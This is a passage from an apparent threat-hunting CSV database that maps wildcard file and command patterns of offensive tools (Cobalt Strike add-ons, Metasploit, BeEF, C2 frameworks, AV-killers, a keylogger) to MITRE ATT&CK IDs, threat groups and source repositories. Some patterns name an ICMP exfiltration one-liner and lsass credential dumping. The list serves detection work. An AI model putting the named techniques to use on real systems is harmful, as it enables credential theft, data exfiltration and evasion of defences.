using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,0,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*XOR_b64_encrypted*covenant.txt*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*XOR_b64_encrypted*covenant2.txt*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - 
T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*XOR_b64_encrypted*havoc.txt*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*xor_payload*,offensive_tool_keyword,cobaltstrike,A simple python packer to easily bypass Windows Defender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Unknow101/FuckThatPacker,1,1,N/A,10,10,612,91,2022-04-03T18:20:01Z,2020-08-13T07:26:07Z -*xor-bin.py *.exe*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense 
Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,0,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z -*xoreaxeaxeax*,offensive_tool_keyword,Github Username,github username hosting obfuscation and exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/xoreaxeaxeax,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*XorEncoder.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*XOR-Payloads.py*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*xpipe \\*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,0,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -*xpipe*lsass*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,1,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -*xpipe.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,1,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -*xpipe.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/boku7/xPipe,1,1,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -*xpipe.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,1,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -*xpn*ntlmquic*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*xrdp.c*,offensive_tool_keyword,xrdp,xrdp provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp accepts connections from a variety of RDP clients: FreeRDP. rdesktop. NeutrinoRDP and Microsoft Remote Desktop Client (for Windows. Mac OS. 
iOS and Android).can be used by attacker,T1076 - T1021.003 - T1021.002,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/neutrinolabs/xrdp,1,0,N/A,N/A,10,4820,2704,2023-10-02T15:48:32Z,2011-04-25T14:31:17Z -*xs.exe -connect *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*xscreensaver_log_priv_esc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*xshell_xftp_password.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*XSpear -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*xspy -display*,offensive_tool_keyword,xspy -display,Keylogger Monitors keystrokes even the keyboard is grabbed.,T1056 - T1059 - T1007 - T1113,TA0006 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/mnp/xspy/blob/master/xspy.c,1,0,N/A,N/A,1,22,15,2018-03-19T12:16:25Z,2011-07-26T18:37:00Z -*xsrfprobe -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*xsser -u * -g */login?password=* --Coo*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*XSS-labs*,offensive_tool_keyword,xss-labs,small set of PHP scripts to practice exploiting XSS and CSRF 
injection vulns,T1059.003 - T1190 - T1600,TA0002 - TA0007 - ,N/A,N/A,Web Attacks,https://github.com/paralax/xss-labs,1,1,N/A,N/A,1,50,26,2017-12-22T19:38:15Z,2016-03-24T19:43:37Z -*XSS-Payloads*,offensive_tool_keyword,XSS-Payloads,A fine collection of selected javascript payloads.,T1059 - T1068 - T1071 - T1506,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Web Attacks,http://www.xss-payloads.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*xssrays.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*xssrays.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*xssrays_spec.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*xssraysdetail.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*xssraysscan.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*XSStrike*,offensive_tool_keyword,XSStrike,Advanced XSS detection and exploitation suite.,T1189,TA0001,N/A,N/A,Exploitation tools,https://github.com/UltimateHackers/XSStrike,1,0,N/A,N/A,10,12018,1823,2023-08-05T13:49:45Z,2017-06-26T07:24:44Z -*xxd -p -c 4 /* | while read line* do ping -c 1 -p *,greyware_tool_keyword,xxd,ICMP Tunneling One Liner,T1090 - T1002 - T1016,TA0011 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*XXEinjector*,offensive_tool_keyword,XXEinjector,XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.,T1573.001 - T1573.002 - T1574,TA0007 - ,N/A,N/A,Web Attacks,https://github.com/enjoiz/XXEinjector,1,1,N/A,N/A,10,1363,311,2020-08-27T12:33:26Z,2015-05-16T10:56:14Z -*xxePayloads.ini*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*XX-PHISHING-LINK-XX*,offensive_tool_keyword,bitb,Browser templates for Browser In The Browser (BITB) attack,T1056.001 - T1134 - T1090,TA0005 - TA0006 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/mrd0x/BITB,1,0,N/A,10,10,2645,463,2023-07-11T04:57:46Z,2022-03-15T16:51:39Z -*X-YSOSERIAL-NET*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*xzfbmR6MskR8J6Zr58RrhMc325kejLJE*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*Y29iYWx0c3RyaWtl*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Y2F0Y2hldHVtYm90aWZ5b3VjYW4-*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*yanncam/ShuckNT*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*YaraFilters*lsassdump.yar*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*yasserjanah/CVE-2020-5902*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/yasserjanah/CVE-2020-5902,1,1,N/A,N/A,1,37,13,2023-05-22T23:32:39Z,2020-07-06T01:12:23Z -*YaWNdpwplLwycqWQDCyruhAFsYjWjnBA*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*Yaxser/Backstab*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*Yay! 
No SYSMON here!*,offensive_tool_keyword,sysmonquiet,RDLL for Cobalt Strike beacon to silence Sysmon process,T1055 - T1055.012 - T1063,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ScriptIdiot/SysmonQuiet,1,0,N/A,N/A,1,81,15,2022-09-09T12:28:15Z,2022-07-11T14:17:34Z -*YDHCUI/csload.net*,offensive_tool_keyword,cobaltstrike,A cobaltstrike shellcode loader - past domestic mainstream antivirus software,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/csload.net,1,1,N/A,10,10,123,13,2021-05-21T02:36:03Z,2021-05-20T08:24:16Z -*YDHCUI/manjusaka*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense 